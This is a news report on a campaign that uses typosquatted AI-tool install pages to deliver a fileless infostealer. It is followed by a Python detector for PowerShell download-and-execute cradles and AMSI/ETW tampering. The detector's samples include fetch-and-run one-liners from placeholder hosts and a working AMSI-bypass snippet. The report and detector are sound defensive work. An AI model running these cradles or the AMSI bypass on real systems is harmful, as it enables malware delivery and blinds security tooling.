Cybercriminals are using fake websites for popular artificial intelligence (AI) tools to trick software developers into downloading data-stealing malware. The campaign was first spotted on April 21, 2026, by an independent security researcher. On May 21, 2026, the security research firm EclecticIQ released a full report showing that a single, financially motivated threat actor had been registering malicious domains since early March 2026. The campaign specifically targets developers in the US and the UK by exploiting their trust in new AI utilities, as reported by HackRead.

The attackers use SEO poisoning to push fake installation pages up in search engine results, so that developers searching for AI tools such as Google Gemini CLI or Anthropic's Claude Code land on typosquatted domains. These sites closely mimic the vendors' official documentation. On a fake Gemini page, visitors are prompted to run a PowerShell command that downloads a fileless infostealer. The malware operates entirely in memory, disabling security features such as AMSI and ETW before stealing credentials and session cookies from browsers and from applications including Slack, Microsoft Teams, and Discord. It also targets cryptocurrency wallets and cloud storage files, and includes a remote code execution capability that gives the operators direct access to the victim's network.

More than 30 other fake domains targeting various developer tools are also active. The attackers have used a stolen Extended Validation code-signing certificate to suppress Windows security warnings, which means a valid signature alone is not proof that an installer is genuine: the publisher named in the certificate should match the vendor being installed. Developers are advised to verify download sources, check the signer of any installer, and scan files before execution.

Source: HackRead
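The delivery pattern described above (a copy-pasted PowerShell one-liner that fetches and executes a remote script, followed by in-memory tampering with AMSI and ETW) is what a detection engineer would want to triage from PowerShell script block logging (Event ID 4104). The Python below is an added example and is not code from the article, HackRead, or EclecticIQ. The trusted-host list, the indicator strings, and the sample script blocks, including their domain names, are assumptions constructed for illustration and are not indicators from the campaign.

```python
"""Heuristic triage of PowerShell script-block log text for a remote
download-and-execute cradle followed by AMSI/ETW tampering.

Added example, not code from the article, HackRead, or EclecticIQ. All log
text, host names, and indicator lists below are constructed assumptions.
"""
import base64
import re
from urllib.parse import urlparse

# Hosts a developer would legitimately fetch tooling from. Assumption for this
# example; extend to the vendors your team actually uses.
TRUSTED_HOSTS = {
    "github.com", "raw.githubusercontent.com", "registry.npmjs.org",
    "storage.googleapis.com", "claude.ai", "anthropic.com",
}

# Download-cradle cmdlets/aliases and the execution sinks they are piped into.
DOWNLOAD_CMDS = re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|"
                           r"DownloadString|DownloadFile)\b", re.I)
EXEC_SINKS = re.compile(r"\b(?:iex|Invoke-Expression)\b|\[scriptblock\]::Create", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`)]+", re.I)

# Strings that commonly appear when a script patches AMSI or ETW in memory.
# Heuristic list assumed for this example, not published IOCs.
AMSI_INDICATORS = ("amsiInitFailed", "AmsiScanBuffer", "AmsiUtils", "amsiContext")
ETW_INDICATORS = ("EtwEventWrite", "EtwNotificationRegister", "PSEtwLogProvider")
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    indicator checks see the real script, not just the wrapper. Returns the
    text unchanged when there is no flag or the argument does not decode."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return text
    try:
        return text + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text


def is_trusted(host: str) -> bool:
    """True if host is a trusted host or a subdomain of one."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def triage_script_block(text: str) -> dict:
    """Return heuristic findings for one logged script block."""
    script = decode_encoded_command(text)
    lowered = script.lower()
    findings = {"untrusted_cradle": [], "amsi_tamper": False, "etw_tamper": False}

    # A download cmdlet piped into an execution sink is the cradle shape; only
    # URLs pointing outside the allowlist are reported.
    if DOWNLOAD_CMDS.search(script) and EXEC_SINKS.search(script):
        for url in URL_RE.findall(script):
            host = (urlparse(url).hostname or "").lower()
            if host and not is_trusted(host):
                findings["untrusted_cradle"].append(host)

    findings["amsi_tamper"] = any(i.lower() in lowered for i in AMSI_INDICATORS)
    findings["etw_tamper"] = any(i.lower() in lowered for i in ETW_INDICATORS)
    findings["suspicious"] = (bool(findings["untrusted_cradle"])
                              or findings["amsi_tamper"] or findings["etw_tamper"])
    return findings


# Constructed Event ID 4104 script-block texts. Domain names are placeholders.
SAMPLE_BLOCKS = [
    # 1. Install from a trusted host: should not be flagged.
    "irm https://raw.githubusercontent.com/example-org/tool/main/install.ps1 | iex",
    # 2. One-liner copied from a look-alike documentation page.
    "irm https://gemini-cli-install.example/install.ps1 | iex",
    # 3. Second stage: AMSI and ETW patched in memory before the stealer runs.
    "$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
    "$a.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
    "[Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')",
    # 4. The same cradle hidden behind -EncodedCommand.
    "powershell -nop -w hidden -enc " + base64.b64encode(
        "iwr https://claude-code-setup.example/setup.ps1 | iex".encode("utf-16-le")).decode(),
]


def triage_all(blocks=SAMPLE_BLOCKS) -> list:
    return [triage_script_block(b) for b in blocks]


if __name__ == "__main__":
    for block, result in zip(SAMPLE_BLOCKS, triage_all()):
        print(("ALERT " if result["suspicious"] else "ok    ") + repr(block[:60]), result)
```

The allowlist approach matters here because the cradle itself (`irm ... | iex`) is also how legitimate installers are distributed; what distinguishes the campaign is the host, so the host rather than the cmdlet is the thing to report. Decoding `-EncodedCommand` before matching avoids the common blind spot where the indicators are only present inside the base64 payload.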